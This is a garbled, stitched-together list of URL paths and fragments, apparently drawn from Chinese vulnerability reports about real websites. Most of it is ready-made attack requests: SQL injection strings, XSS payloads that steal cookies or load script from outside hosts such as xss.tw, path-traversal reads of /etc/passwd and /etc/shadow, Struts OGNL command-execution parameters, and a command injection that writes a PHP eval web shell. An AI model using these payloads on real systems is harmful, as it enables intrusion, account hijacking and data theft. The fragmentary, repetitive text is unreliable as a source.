d27cdb6e-ae6d-11cf-96b8-444553540000 /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf /settings/bindemail /gwcx/informationAction.do?m=loaddetail&id=13564925723197B3925492345F5F24E6614FB90073C58 /shopunion/list.php?kwd=1'and blank有同样功效,可以继承effective /submit/authmail/ /club/bbs-post-run?fid=208&oid=1005100210001,如图: /club/read-353489-1,如图: /club/bbs-post-modify?tid=353489&pid=0,触发xss。如图: /club/bbs-post-run?fid=208&oid=1005100210001。插入超链接,在插入链接的说明出,未过滤,导致xss。如图: /setting/change-email /bar/open/dongman http://58.215.169.240 http://passport.note.sdo.com/bin.zip //admin.qianpin.com/zxsale-sys2/portal/login.action同样可以得到千品网商户管理后台,这就有的发现喽。。。 http://home.woool.sdo.com/admin/admin.rar /app/v1.0/save_refund_list.cgi?e_time=%E9%80%89%E6%8B%A9%E6%97%A5%E6%9C%9F&time_type=0&s_time= /app/v1.0/save_refund_list.cgi?s_time=%E9%80%89%E6%8B%A9%E6%97%A5%E6%9C%9F&time_type=0&&e_time /show/product/plist.shtml?maintype=%E6%9C%BA%E6%A2%B0%E8%AE%BE%E5%A4%87&page=1&subtype=%E7%94%B5%E5%B7%A5%E7%94%B5%E5%99%A8%E6%88%90%E5%A5%97%E8%AE%BE%E5%A4%87&type=1 www.8809.cn /show/userinfo/selectuserinfo.shtml?describe=5201314%27+and+%271%27=1&index=1&size=8 /show/userinfo/selectuserinfo.shtml?describe=5201314%27+and+%271%27=%271&index=1&size=8 /2pdf/down.aspx?fn=/down/2013/x/xx/xxx/xxxxx.pdf /cloud/appdetail?type=2&appid=256715 /cloud/appdetail?type=2&appid=256718 /item.htm?spm=a1z10.3.4002-193867489.10.9mUiIn&id=20606632133 /Login.aspx /list.php?p=9&category=3 /upload/images/40906054/1331868269065_1.xls / /guest/register?type=retrieveUserCode /wap.at-gou.com/view.php?id=170 /wap.at-gou.com/view.php?id=170 /wap.at-gou.com/view.php?id=170 /wap.at-gou.com/view.php?id=170 /trade.php?tradecode=databack&filename=/../mod/system/set/trade/softset.php /index.php?_m=tickets&_a=submit /upload/addpic?callback=parent;prompt(/test/);//&code=3002 /magic/brand/1qi?keyword=1%3C%2ftitle%3E%3Cscript%3Eprompt%28document.cookie%29%3C/script%3E /2013/01/05/146/13573533461773126m.jpg 
/Du8ka9?'+Math.random();document.body.appendChild(s) /2013/01/05/146/13573533461773126m.jpg /Du8ka9?'+Math.random();document.body.appendChild(s) /NAVIERR.HTM#-2146697211#https://mail.qq.com/cgi-bin/loginpage /qq.php /fanliduo.zip /fanliduo.zip var PageData.tbs,kw:PageData.forum.name,fid:PageData.forum.id,tid:prompt("帖号"),pid:prompt("楼层pid"),word:option_editor.userInfo.user_name};$.post var PageData.tbs,kw:PageData.forum.name,fid:PageData.forum.id,tid:prompt("请输入要恢复的帖号"),pid:prompt("请输入要恢复的楼层pid"),word:option_editor.userInfo.user_name};$.post("/f/commit/post/delete/cancel",c);void /space/Group/MyGroupList.aspx /space/Group/Album.aspx?groupid=24936 /space/group/Events.aspx?groupid=24936 /space/group/CreateTree.aspx?groupid=24936 /space/group/Contact.aspx?groupid=24936 145px 145px url(Images/DL.jpg) 82px 32px /doLogin.aspx?UserID=admin'--&PWD=123 /smsweibo/index.php/wap/pay/goto_bank?fee=15 /snap.cgi?d=1747679200769378085&w=%A1%BE%BE%AB%BB%AA%A3%AC%BB%F0%A1%BF%D3%D0%CD%BC%D3%D0%D5%E6%CF%E0%A3%AC%B7%C7%C4%E3%C4%AA%CA%F4%CF%D6%B3%A1%A3%AC%B0%D4%C6%F8%CD%FE%CE%E4%A3%AC%B8%F8%C1%A6%B0%A1%A3%A1&u=http://feinimoshu.dajie.com/discuss/topic/162247/detail /2013/01/04/117/13573151176041810m.png /6Y3Mpn?'+Math.random();document.body.appendChild(s) /shop/507560/review_more www.foundersc.com/wzweb/common/downloadAtt.action?attPath=../../../../../etc/passwd&infId=17488390&attType=application/txt&attNm=passwd&ei=VCnpUMG0E4iZkAXuoIGYBg&usg=AFQjCNGp4L_piA3IlzLFDXd0Yp-XceNFrg /showIndexArticlesAction.htm?recordType=2 /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /bmsh/ /microblog/create /vul/discuz_swfupload.swf /UserLoginAction.action 
/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fe.jufuka.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php /apply.php /bj/bbs/ /searchgoods.do /points/pointsAction_mall.do /news/newsAction_getDetailsById.do /front/detailZ-getDetailZs.do /member/loginAction_toRegistPersonal.do /pc123/login.php /pc123/data/dump.sql-1 /shop/member!passwordRecover.action /soft/1279.htm 0px;scrollbar-face-color:buttonface;scrollbar-highlight-color:buttonface;scrollbar-shadow-color:buttonface;scrollbar-3dlight-color:buttonhighlight;scrollbar-arrow-color:#797979;scrollbar-track-color:#EEEEEE;scrollbar-darkshadow-color:buttonshadow 9pt;font-family buttonhighlight 18;border:1 buttonface ffffff;color:FF8000;text-align:center;width:8pt;height:8pt;corsur:hand 7pt;height:7pt none /opi/ /xxxxxxxxx/url/parse /&hostid=259069614&requestToken=-582841836&_rtk=a903886e /teladmin/ a.com/load.swf能够加载任意的swf,我直接打开http://a.com/load.swf?url=http://b.com/xss.swf,能不能执行脚本? String Object /swf/avatar.swf?jslang=alert(1) /xss.swf?a=alert&b=1 /xss.swf?a=alert(2)&b=1 /xss.swf?a= /vul/wan.360.cn_swf_avatar.swf /item.htm?spm=a1z0k.1000778.1000385.6.cUYUGK&scm=1007.61.0.0&id=16932942268&pvid=879bec5e-a7c3-4914-94c6-928b229ca3bf&ad_id=&am_id=&cm_id=&pm_id= /view/3581925.htm /s?q=%3Cimg+class%3D%E2%80%8B%22xsstest%22+title%3D%E2%80%8B%22%5Babcd%5D%E2%80%8B%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%22+src%3D%E2%80%8B%22x%22+onerror%3D%22alert%28%2Fxss%2F%29%22%3E&pq=%3Cimg+class%3D%E2%80%8B%22alignnone%22+title%3D%E2%80%8B%22%5Babcd%5D%E2%80%8B%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%22+src%3D%E2%80%8B%22x%22+onerror%3D%22alert%28%2Fxss%2F%29%22%3E&_xv=187&_re=0&src=srp / /group/search/?t=4&q=aa'/**/and/**/1=1%23 /group/search/?t=4&q=aa'/**/and/**/1=2%23 /group/search/?t=4&q=aa'/**/and/**/1=2/**/union/**/select/**/1,version(),3,4,5%23 
/Setup/Default.aspx,没有做权限验证,任何用户都能访问。在这里可以重置任意用户的密码(昨天发现的,重置了管理员Administrator的密码登录了后台,今天发现已经没权限重置Administrator的密码了,但发现仍然可以重置普通用户的密码)。面临被清除所有用户的风险。 /index.action /appProjectInfo.action jypt.zpjy.net/go.action 8189/huanghai/long!getJianjie.action /mcategory.action /web/ShowIndex/action.do?headerState=2 /adc/download.do?filename=../WEB-INF/web.xml /adc/download.do?filename=../WEB-INF/ssb-config.xml /SSMN_ADMIN_WEB_V1.8.3/ /publicnotice/systemNoticeViewList.action url(xxx.jpg)去显示的淘宝店铺的logo。 www.taobao.com中logo处我们插入的css的效果。 / /go/act/readtown/admin.php /user/%2522%253E%253Cimg%2520src%253D1%2520onerror%253D%2522alert%28%252Fxss%252F%29%2522%253E&Refer=SUer_box /index.php?mod=search&act=findperson&schooltype=3&schoolid=81349&schoolname=%E5%8C%97%E4%BA%AC%E5%A4%A7%E5%AD%A61%3Chi%3E222%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E /reader#PageMgr.goIndexPage() /reader#PageMgr.goIndexPage(alert(/xss/)) /search?searchType=all&keyword=%22%3E%3C%73%63%72%69%70%74%2F%73%72%63%3D%68%74%74%70%3A%2F%2F%78%73%73%65%72%2E%6D%65%2F%57%36%58%5A%50%78%3F%31%33%35%33%30%37%33%33%32%34%3E%3C%2F%73%63%72%69%70%74%3E /huigu.php?paiqi=13 /huigu.php?paiqi=13 /content/1562说的很对,认证的信息没有将网站A的帐号A与第三方网站C的帐号C联系起来,截获的认证信息只能证明帐号C具有访问网站C的能力,所以网站A的帐号B,访问了截获的认证信息后,一样可以绑定到网站C的帐号C上,造成了账户劫持被利用。 
/RenRen/Bind.aspx?_action=GetUser&data=%7b%22PkID%22%3a0%2c%22Code%22%3a0%2c%22CreateDate%22%3a%22%5c%2fDate(1357535393150)%5c%2f%22%2c%22LastModifyDate%22%3a%22%5c%2fDate(1357535393150)%5c%2f%22%2c%22ThirdPartySign%22%3a6%2c%22Other_UID%22%3a%22505316817%22%2c%22Other_Token%22%3a%22207023%7c6.0968a11612b566c72891194dfbfdb3f3.2592000.1360130400-505316817%22%2c%22Other_TokenSecret%22%3anull%2c%22Other_NickName%22%3a%22%e6%9d%9c%e8%85%be%22%2c%22Other_Gender%22%3a1%2c%22Other_Description%22%3anull%2c%22Other_Profile_Image_Url%22%3a%22http%3a%2f%2fhead.xiaonei.com%2fphotos%2f0%2f0%2fmen_head.gif%22%2c%22Other_Profile_Url%22%3anull%2c%22Other_Verified%22%3afalse%2c%22Other_CityID%22%3a0%2c%22Other_Location%22%3anull%2c%22Other_FollowersCount%22%3a0%2c%22Other_FriendsCount%22%3a0%2c%22Other_StatusesCount%22%3a0%2c%22Other_FavouritesCount%22%3a0%2c%22Other_CreateDate%22%3a%22%5c%2fDate(-62135596800000)%5c%2f%22%2c%22Other_LoginUser%22%3anull%2c%22Other_Password%22%3anull%2c%22IsRandomAccount%22%3a0%2c%22Oauth_Version%22%3a2%2c%22Other_Refresh_token%22%3anull%2c%22Expires_In%22%3a%22%5c%2fDate(1360130399150)%5c%2f%22%7d /dpool/sports/nba/index.php?action=boxscore.lists&host=1&refresh=0&back=imp&match_id=2012122910 /managerOneGgxxfb.action?fbxxid=52cd9ec922d03cb7012360294dbe0002 /home/plug.php?do=expert&ac=foreList&uid=65030&czid=2 /domain-admin/domainManage.net?IDDomain=11639876 /StyleList1.aspx?ID=1020000&parentID=1020000 /zp/teacher.aspx /portal/bizdesk/streamsvlt?imgType=jpg&showImg=1&url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow /portal/bizdesk/streamsvlt?imgType=jpg&showImg=1&url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cr/ksbm/prereg.action 40% /bbs/uploadimg/ /bbs/ /bbs/ /djykz/content.php?content=5983 /fckeditor/editor/fckeditor.html /upload_files/media/xxxxx.jpg /upload_files/media/xxxxx.jpg/shell.php /fckeditor/editor/filemanager/connectors/test.html /cli.cgi?cmd=echo%20账号:%;$poe_user%;echo%20密码:%;$poe_pass% 
/ajdrvzk/subjectOne/one!islogin.action www.crsp.org.cn /show.php?id=659 /upload1.aspx /meeting/MeetingNews!detail.action /group/129yo/edit/basic /ajaxCareFriend.do?uid=1981622273 /siteserver/login.aspx /talkbox.php?text=%E5%A4%A7%E7%A7%A6%E6%8A%A5%E6%96%99 /talkbox.php /bbs/bbs/bbs_index.action?id=275 /my_setting.php?action=outemail&bingEmail=********@qq.com / num3+1 /ft/question.fb?pid=3&cid=33518918&type=0&pno=1%22%3E%3Cimg%20src=1%20onerror=%22alert%28/xss/%29%22%3E%3Cscript%20src=http://xss.tw/762%3Ealert%281%29%3C/script%3E /RW5AQ /2011/03/other-reason-to-beware-of.html Event String Object /vul/wordpress_plupload.flash.swf /services/webhosting/newindex.asp //resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /movie/47953 /feed /informationIntend/news/register.jsp /informationIntend/news/personal.jsp /informationIntend/fckeditor_2.6/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector /informationIntend/UserFiles/Image/test.jsp www.36kr.com时弹出对话框 /Destinations/Action/xcxtx_sc/pocket.asp?id=56 /EOMS_J2EE/ /EOMS_J2EE/ /CFR/ /EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=2012121111284296.doc&fileatt=2013年系统对外提供服务时间安排_2012121111284296.doc /EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E 15392:0:99999:7 15392:0:99999:7 /upload/cards/ /user/logout.htm?goto=xxx /core/customer/aliyuntips /question.do?m=ask url.cn/BY3LeX /api/addfriendship/?uid= /api/addfriendship/?uid=1981622273 /plus/search.php?keyword= /user/info /user/userinfo.php /zhenaios/spRet.action /files/img.php?docid=2314287%df%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /files/img_new.php?docid=2366714%df%27 
/weibozhuanfa.php?id=282355%20and%20exists%28select%20*%20from%20information_schema.TABLES%29%23 /expo3/single.php?id=113639 /jmx-console/ /。是一个JS基础库,提供一个可简单方便的实现各种扩展功能的JS库。这些并不重要。重要的是它提供了在线演示,直觉告诉我这肯定会有XSS漏洞,只是不知道会有多大权限而已,但是再不济也能获得一个baidu.com域名下的转向链接,绿勾的哦! /?m=frontData&a=demoEdit /页面,加载通讯录、短信、手机配置信息等都是Ajax /service/uc_contactAct/searchSimpleContact.jsonp /service/uc_contactAct/searchSimpleContact.jsonp?p0=%E5%85%A8%E9%83%A8%E8%81%94%E7%B3%BB%E4%BA%BA&p1=0&_=1357611733951&callback=a%3D /service/fm_smsAct/getSmsGroups.jsonp?p0=phone&p1=0&p2=10&_=1358057353920&callback=b%3D /service/fm_settingAct/getDeviceInfo.jsonp?_=1358057422226&callback=c%3D /profile.php?uid=1807689562&ref= /attention/aj_addfollow.php?uid=1981622273&fromuid= /jtec/portal/home/portal-home!infoShow.action?id=42,830 /mail-archive/web/oauth/current/msg09270.html /content/674 /order/registerInfo.htm?email=xxxx@xxx.com&code={code d27cdb6e-ae6d-11cf-96b8-444553540000 d27cdb6e-ae6d-11cf-96b8-444553540000 d27cdb6e-ae6d-11cf-96b8-444553540000 /feedback.htm /list?menuid=1 /index2.php?id=8776 /admin/index /admin/index/login /tianwang/admin/index/login /shop/admin/index/login /admin/index / /gmkt.inc/Member/ForgotMemberPwdSearch.aspx?p1=1j8D5pO_g_2_w我是隐藏部分hpSvQ_g_3__g_3_&p2=xxxxx@sina.com /gmkt.inc/Member/ForgotMemberPwdSearch.aspx?p1=T6W_g_2_vO0pyOBYOspiYmVW5w_g_3__g_3_ /cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php /cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||chmod https://www.tenpay.com/v2/iframe/msg/index.shtml?url=http://juhui.tenpay.com%252f@baidu.com/ /product/product/id/47 www.yokagames.com/product/product/?id=47 /ydadmin/window.asp /share/follow?followfrom=op.wz.gfo&keyfrom=op.wz.gfo&sitechannel=no&method=follow&screenName=【微博ID】 /p2/download.php?file=c:\windows\repair\system /gp/system_web/.svn/text-base/inc_connection.php.svn-base /gp/system_web/inc_connection.php.bak /gp/ckeditor/ 
/jobs/description/index.php?selid=188 /help/help.jsp www.qq.com也检查的差不多了。 http://www.qq.com:%2f%23@wooyun.org /order.html?gkey=&skey=&sqid=&dqid="/ /test.jsp /css/myquery/queryWQSBill.action?waybills=112821181021&verifycode= /css/myquery/queryWQSBill.action?waybills=112821181030&verifycode= /newhrm/login/login.aspx /share/retweet /public/accountMobileActive.jsp?msg=error&mobile=13xxxxxx /detail.do?ideaId=814 /store/apply.do /checkoutV3/receiver/saveReceiver.do?receiver.id=17731651 /?domain=qq.com /#qq.com /qqshow_v3/htdocs/live/popup/361/popup.html?domain=qq.com /ac/qqshow/qsfl/2_71/core.js这个js中我们找到了QSFL.excore.getURLParam函数,就是和我们猜测的一样。 /qqshow_v3/htdocs/live/popup/361/popup.html?domain=com /tmp/updateme/sinfor/ad/sys/sys_user.conf /backaudit.do?m=question /user/user_findEmailPassword.shtml?uuid=ff808081******************f25b1d0a9b /s_my_iphone_all_all_0_2#_0_0_1/ /s?key= /pp/?categoryID=101&date=2013-01-15&deviceid=1&type=3 / /ws/ykjcx/cxend.jsp?wen=36676eece664166e6252a1264d / /cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'and'1'='1 /cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'and'1'='2 /cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'or%20version()%3E1%23 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 
/news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /misc.php?mod=faq&action=search /106495/widget/bazaar/3522281/item/138859/ /106495/widget/bazaar/3522281/item/138859/edit xsser.me/xss?12345 /admin/admin.jsp /getlogin?oldps=&newpsd=wooyun&method=xgmm /getlogin?tel=138008008&email=麻花藤@qq.com&method=xggrxx /front/index.jsp) /front/pages/goodinfo.jsp?goodId=511203293788 /user/orderDetail.jspx?orderId=xxxxxx / /ebpn/click.html?aid=1000082335000100001&mc=0%5EC0%5EC1000082335000100001%5EC0%5EC0%5EC1%5EC100%5EC1358423062%5EC1000000_261508836%7C1%7C1989-01-01%7C24%7C2%7C0086610100000000%7C400000010011_0086610100000000%7C44%7C0%7C0%7C0086610100000000%5EC100000000060%5EC0%5EC%5EC%5EC-&refresh_source=3&refresh_idx=0&engine_type=&ref=http%3A%2F%2Fwww.renren.com%2Fhome&url=http%3A%2F%2Ftrack.yx.renren.com%2Fredirect%2F893%3Fabflag%3Dplay%26statID%3Dad_100000000060_1000082335000100001%26level%3D0 /bolt/campaign/campaignDetail.htm?campaignID=1000082335 act.news.qq.com/show_umodify.php mail.qq.com/cgi-bin/login?vt=passport&vm=wsk&delegate_url=得到sid。 /servlet/frontindex?deptIds=83 /rcc/pages/login.jsp /rcc/servlet/backstageMgrServlet?loginflag=T&pagetype=3&userid=1 /rcc/file.jsp /rcc/complaints_insert.jsp /images/ /third/insertTwitter /third/post.jsp?link=http%3A%2F%2Fyule.sohu.com%2F20130117%2Fn363726424.shtml&title=%E4%B8%93%E8%AE%BF%E5%91%A8%E6%98%9F%E9%A9%B0%EF%BC%9A%E5%A6%82%E6%9E%9C%E8%A7%82%E4%BC%97%E6%8E%A5%E5%8F%97%20%E6%88%91%E5%B0%B1%E7%BB%A7%E7%BB%AD%E5%90%83%E8%80%81%E6%9C%AC-%E6%90%9C%E7%8B%90%E5%A8%B1%E4%B9%90 url(#default#AnchorClick) alert(1) /front/news/newsframe.jsp?newsid=597 /json/GetVerifyCode.html?phone=13666xxxx&rc=验证码 /tickets/orderinfo.html?SerialId=T13011905550 /ajaxpostcards.php?next=1&prev=0&nowid=1%22 /attention/add?st=9301&uid=1768856242&rl=1&vt=1&wm=4007&gsid=3_5xxxxxxxxxxxxxxxxx /u/1768856242?vt=1&wm=4007&gsid=3_5xxxxxxxxxxx text/html /76/?keepsession=&location= /zjDyshd 
/forum.php?mod=misc&action=rate&ratesubmit=yes&infloat=yes&inajax=1formhash=3a0d2122&tid=111664&pid=1819715&referer=http%3A%2F%2Fdzs.gamebbs.qq.com%2Fforum.php%3Fmod%3Dviewthread%26tid%3D111664%26page%3D0%23pid1819715&handlekey=rate&score2=5&reason=%E6%94%AF%E6%8C%81%E5%8E%BB%E6%8E%89TP%EF%BC%81&ratesubmit=true[/img www.qq.com处理完之后,我们继续来看看这里的问题。 /services/service.php?m=exchange&a=good&id=10165&ex_num=-1 /exchange.php?action=show&id=10165 /expert/expertLogin/expertLogin_main.action /docs/funcspecs/2.jsp?sort=1&file=d:\ /login.action存在structs任意命令执行漏洞 /q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=&t1=all /q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all /zdy/page/lc600_sp.html?url=68397653_2202974785_Z0u3GCJuDm7K+l1lHz2stqkP7KQNt6nni2q2slWgIgZcQ0/XM5Gfat4O5y/TA9kEqDhAQpA8fPkg0h4 /go/getflashplayer /api/sinawebApi/outplayrefer.php/vid="+right+"/s.swf /zdy/page/lc600_sp.html?url=11 /gamecenter/tools/index.php www.xmgwbn.com / /s?deviceid=1&clienttype=2&key=1 /s_test_iphone_yiyao /.htaccess /info /touch/leavemsg.php?sid=3d41%22%3E%3Cscript%20src=http://localhost/test/dd.js%3E%3C/script%3E%3C%22 /Found/pagetop_2012.js PageTopLogIn();\ PageTopRegist();\ PageTopSignOut();\ /readnews.action /Zlcms/WebPublish/contentPage.action /web/template/web-articleInfo.action /kexie/tjsinfo/index/web_main.action /adservice/Web.config /login/nfyycms.do /view/50978/307535 /tracker/trackandtraceInit.do /tracker/trackandtraceInit.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) 
/tracker/trackandtraceInit.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) / /存在DEDE的注入 /plus/search.php?keyword=as&typeArr[111%3D@`\ /存在DEDE的SQL注射 /plus/search.php?keyword=as&typeArr[111%3D@`\ /存在SQL注射 /plus/search.php?keyword=as&typeArr[111%3D@`\ /cmsv55_jbdq/plus/search.php?keyword=as&typeArr[111%3D@`\ /iphone-yule/ /wiki/index.php?fulltext=Search&ns0=help&search=help&title=tianya /a可下载其部分源码。 /index2.php?id=8724 / / /plus/search.php?keyword=as&typeArr[111%3D@`\ /plus/search.php?keyword=as&typeArr[111%3D@`\ www.shopex.cn存在DEDE的SQL注射 /plus/search.php?keyword=as&typeArr[111%3D@`\ /curl.chinacache.com/usermanage.php /plus/search.php?keyword=as&typeArr[111%3D@`\ /plus/search.php?keyword=as&typeArr[111%3D@`\ /plus/search.php?keyword=as&typeArr[111%3D@`\ /plus/search.php?keyword=as&typeArr[111%3D@`\ /admin/newstext.asp?id=657 /admin/admin.asp /count.php?id=107 /app/hostapply.php?productid= /app/hostapply.php?productid=&bandtype=&count_id=0 /app/domainreg.php?productid=1'&type=0 /greenchannel_company.html?YTAG=2.1796620002 /?m=home&a=devlevel&level=normal_level&voteme=XXXXX&makesure=1[/img /?m=home&a=normal_developer_recommended_floatbox&email=xxxxxxx@qq.com /excel/(2012-2013-1)-0201005130-0201009-1cjhdd2.html /?m=home&a=devlevel&level=normal_level&voteme=XXXXX&makesure=1 /admin/uploadfile/2013/01/21/help.asp /wapLogin/getFlow.action /wapLogin/sendSms.action /wapLogin/getReal.action /productMessage/mealUseCase.action /BillDetails/getBillDetail.action /businessOperations/getAllValueAdds.action /businessOperations/BusOperInfo.action /businessOperations/handleBusiness.action /index.php?url=url /index.php?url=http://somesite/somepage /sompage的php代码为 /index.php?url=http://somesite/somepage /index.php?action=db /Detail.aspx?subjectID=693 / 
/flyiis/trainning/qryLTtrnlist.asp?x_T_TYPE=737&z_T_TYPE=%3D%2C%27%2C%27and%20%28select%20count%28u_name%29%20from%20tbladmin%29%3E0 /login.jsp.bak / /handbook/ /main/kaohe/kaohe.htm /management.asp /newsview.asp?id=-2881 /user/.svn/entries /web/ / /management.asp /papers/42)获取用户acckey和uid,即可登录用户账号了,看分析: /index.php?app=user&act=sessionJs /v4/js/footer.js中进行checklogin判断 /emall/SNMyEasilyBuyFormView?storeId=10052&catalogId=10051&easilyBuyId=6147511 /hotelpay-web/hotelTerminal/fnd/searchHotelOrders.htm?memberId=¤tPage=9&pageSize=15&orderStatusCriteria=&howLong=10 /vgs-web/mobile/oct/orderList.htm /vgs-web/mobile/oct/viewTraveller.htm /new/rleader.php?nid=12 /upload /index/manuscript?mid= /notification_message,随意填写收件人,在内容处存在xss,点击发送,则收件人收到私信,cookie被 / /qu / /zhaopin.php?id=6 /phpinfo.php /front/order_cancelOrder?orderNo=3xxxxxx /这个网址进入QQ空间,随便打开一个人的空间主页,地址格式如下http://qz.qq.com/QQ号码/home /uconsole/frame/index.action /siteserver/TextEditor/fckeditor/ /aj_baropen/support /?u=ddc05c /ky/bkylogin/bkyLogin-main.action /gnuboard/adm/member_list.php?sst=mb_intercept_date /gnuboard/adm/member_list.php?sst=mb_intercept_date music.sina.com.cn/yueku/js/mwp/feedPlayer.swf?vers=3),关键的代码逻辑如下: SoundBaseVO / /xss.swf /xss.swf namespace href=//******** /msg/send/6671203 href=http://xss.tw/989 /msg/send/6671203 namespace /989'&#x0022;&gt 
/ajax/json/shop/review?run=a&s=4550707&category=10&cityid=1&sa=Mo-Mo%E7%89%A7%E5%9C%BA&s1=0&s2=0&s3=0&ap=-1&body=%E7%8E%AF%E5%A2%83%E4%B8%8D%E9%94%99%EF%BC%8C%E5%BA%97%E9%9D%A2%E4%B9%9F%E5%BE%88%E5%A4%A7%EF%BC%8C%E7%94%A8%E5%B1%8F%E9%A3%8E%E9%9A%94%E5%87%BA%E4%B8%80%E4%B8%AA%E4%B8%AA%E5%B0%8F%E9%97%B4%E3%80%82%0A%E6%88%90%E4%BA%BA%E6%AF%8F%E4%BD%8D138%E5%85%83%EF%BC%8C1%E7%B1%B33%E4%BB%A5%E4%B8%8B%E7%9A%84%E5%B0%8F%E6%9C%8B%E5%8F%8B%E5%8D%8A%E4%BB%B7%E3%80%82%E9%A4%90%E5%89%8D%E6%9C%89%E4%B8%80%E4%BB%BD%E5%B0%8F%E9%A3%9F%EF%BC%8C%E5%8C%85%E6%8B%AC%E4%B8%80%E5%9D%97%E9%B8%A1%E8%82%89%E5%92%8C%E4%B8%80%E4%B8%AA%E5%AF%BF%E5%8F%B8%EF%BC%8C%E8%BF%98%E6%9C%89%E6%B3%A1%E8%8F%9C%E3%80%82%0A%E7%82%B9%E4%BA%86%E5%AF%BF%E5%96%9C%E9%94%85%E3%80%81%E7%89%9B%E8%82%A9%E8%82%89%E3%80%81%E7%89%9B%E4%BA%94%E8%8A%B1%E8%82%89%E3%80%81%E4%BA%94%E8%8A%B1%E8%82%89%E3%80%81%E7%BE%8A%E8%82%89%E3%80%81%E9%AD%94%E8%8A%8B%E4%B8%9D%E7%AD%89%E3%80%82%E8%94%AC%E8%8F%9C%E3%80%81%E8%B1%86%E5%88%B6%E5%93%81%E7%B1%BB%E7%9A%84%E6%98%AF%E5%90%83%E5%88%B0%E4%B8%80%E5%8D%8A%E6%97%B6%EF%BC%8C%E6%9C%8D%E5%8A%A1%E5%91%98%E6%8E%A8%E4%B8%AA%E5%B0%8F%E8%BD%A6%E8%BF%9B%E6%9D%A5%E7%BB%99%E4%BD%A0%E5%8A%A0%E7%9A%84%E3%80%82%E8%82%89%E7%B1%BB%E7%9A%84%E9%83%BD%E9%9D%9E%E5%B8%B8%E5%AB%A9%EF%BC%8C%E5%BE%88%E5%A5%BD%E5%90%83%E3%80%82&dtag=&stag=&park=&ctitle=&setag=false&tap=true&s4=1&cat=false&tuangou=false&star=10&m101=0&keyList=m101&sina_sync=2&qzone_sync=2&sohu_sync=2 /index.php /news.php?id=66此处存在.....然后很不幸的猜到了后台http://mobile.8684.cn/adm/index.php,当然,管理员的密码是很简单的 /m/ /history.show.php?jid=10557 /history.show.php?jid=10557 /back/Links/shownews1.jsp?maxpages=4&size=2&color=6A822D&maxpages1=6&size1=2&color1=black&isbold=bold&isSort=no&catalogFlag=commend_list /dodonew/front/userCenter/index.jsp?dodoId=12121232 /res/images/uploader.swf /res/images/uploader.swf?jsobject=alert(1) www.huanbo99.com)开发的 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf /files/118059/SWF-Upload-Cross-Site-Scripting.html 
